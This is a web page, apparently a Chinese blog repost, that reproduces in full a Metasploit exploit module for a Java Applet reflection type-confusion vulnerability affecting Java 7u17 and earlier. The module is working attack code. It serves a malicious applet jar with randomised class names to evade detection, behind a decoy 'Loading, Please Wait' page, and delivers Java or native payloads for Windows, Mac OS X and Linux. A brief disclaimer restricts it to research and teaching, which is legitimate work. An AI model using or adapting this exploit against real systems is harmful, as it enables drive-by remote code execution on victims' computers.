zoukankan      html  css  js  c++  java

  • Java Applet Reflection Type Confusion Remote Code Execution

    测试方法:

    提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
      1. ##
      2. # This file is part of the Metasploit Framework and may be subject to
      3. # redistribution and commercial restrictions. Please see the Metasploit
      4. # web site for more information on licensing and terms of use.
      5. # http://metasploit.com/
      6. ##
      7.  
      8. require'msf/core'
      9. require'rex'
      10.  
      11. classMetasploit3<Msf::Exploit::Remote
      12. Rank=ExcellentRanking
      13.  
      14. include Msf::Exploit::Remote::HttpServer::HTML
      15. include Msf::Exploit::EXE
      16.  
      17. include Msf::Exploit::Remote::BrowserAutopwn
      18. autopwn_info({:javascript =>false})
      19.  
      20. def initialize( info ={})
      21.  
      22. super( update_info( info,
      23. 'Name'=>'Java Applet Reflection Type Confusion Remote Code Execution',
      24. 'Description'=>%q{
      25. Thismodule abuses JavaReflection to generate a TypeConfusion, due to a weak
      26. access control when setting final fields on static classes,and run code outside of
      27. the JavaSandbox.The vulnerability affects Java version 7u17and earlier.This
      28. exploit doesn't bypass click-to-play, so the user must accept the java warning in
      29. order to run the malicious applet.
      30. },
      31. 'License' => MSF_LICENSE,
      32. 'Author' =>
      33. [
      34. 'JeroenFrijters', # Vulnerability discovery and PoC
      35. 'juan vazquez' # Metasploit module
      36. ],
      37. 'References' =>
      38. [
      39. [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
      40. ['URL','http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html']
      41. ],
      42. 'Platform'=>['java','win','osx','linux'],
      43. 'Payload'=>{'Space'=>20480,'BadChars'=>'','DisableNops'=>true},
      44. 'Targets'=>
      45. [
      46. ['Generic (Java Payload)',
      47. {
      48. 'Platform'=>['java'],
      49. 'Arch'=> ARCH_JAVA,
      50. }
      51. ],
      52. ['Windows x86 (Native Payload)',
      53. {
      54. 'Platform'=>'win',
      55. 'Arch'=> ARCH_X86,
      56. }
      57. ],
      58. ['Mac OS X x86 (Native Payload)',
      59. {
      60. 'Platform'=>'osx',
      61. 'Arch'=> ARCH_X86,
      62. }
      63. ],
      64. ['Linux x86 (Native Payload)',
      65. {
      66. 'Platform'=>'linux',
      67. 'Arch'=> ARCH_X86,
      68. }
      69. ],
      70. ],
      71. 'DefaultTarget'=>0,
      72. 'DisclosureDate'=>'Jan 10 2013'
      73. ))
      74. end
      75.  
      76.  
      77. def setup
      78. path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","Exploit.class")
      79. @exploit_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
      80. path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","Union1.class")
      81. @union1_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
      82. path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","Union2.class")
      83. @union2_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
      84. path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","SystemClass.class")
      85. @system_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
      86.  
      87. @exploit_class_name= rand_text_alpha("Exploit".length)
      88. @exploit_class.gsub!("Exploit",@exploit_class_name)
      89. super
      90. end
      91.  
      92. def on_request_uri(cli, request)
      93. print_status("handling request for #{request.uri}")
      94.  
      95. case request.uri
      96. when/\.jar$/i
      97. jar = payload.encoded_jar
      98. jar.add_file("#{@exploit_class_name}.class",@exploit_class)
      99. jar.add_file("Union1.class",@union1_class)
      100. jar.add_file("Union2.class",@union2_class)
      101. jar.add_file("SystemClass.class",@system_class)
      102. metasploit_str = rand_text_alpha("metasploit".length)
      103. payload_str = rand_text_alpha("payload".length)
      104. jar.entries.each {|entry|
      105. entry.name.gsub!("metasploit", metasploit_str)
      106. entry.name.gsub!("Payload", payload_str)
      107. entry.data = entry.data.gsub("metasploit", metasploit_str)
      108. entry.data = entry.data.gsub("Payload", payload_str)
      109. }
      110. jar.build_manifest
      111.  
      112. send_response(cli, jar,{'Content-Type'=>"application/octet-stream"})
      113. when/\/$/
      114. payload = regenerate_payload(cli)
      115. ifnot payload
      116. print_error("Failed to generate the payload.")
      117. send_not_found(cli)
      118. return
      119. end
      120. send_response_html(cli, generate_html,{'Content-Type'=>'text/html'})
      121. else
      122. send_redirect(cli, get_resource()+'/','')
      123. end
      124.  
      125. end
      126.  
      127. def generate_html
      128. html =%Q|<html><head><title>Loading,PleaseWait...</title></head>|
      129. html +=%Q|<body><center><p>Loading,PleaseWait...</p></center>|
      130. html +=%Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
      131. html +=%Q|</applet></body></html>|
      132. return html
      133. end
      134.  
      135. end
  • 相关阅读:
    [ZT]SAP ECC5.0 Working Log TO 2008.5.26
    VS错误:Lc.exe 已退出错误 返回代码 1
    如何实现两个数据库的同步?
    sp_configure 'max server memory'
    [轉]中国油价世界最高 是美国7倍!
    C#WinForm App自动更新(Live Update)架构
    利用批處理自動在異地備份數據庫
    18种根据屏幕字段查找潜在数据的技巧
    [ZT]2008年到校园招聘各企业待遇曝光
    吉祥物由于具有商业气息,所以历届奥运会吉祥物都没有出场。
  • 原文地址:https://www.cnblogs.com/security4399/p/3043667.html
Copyright © 2011-2022 走看看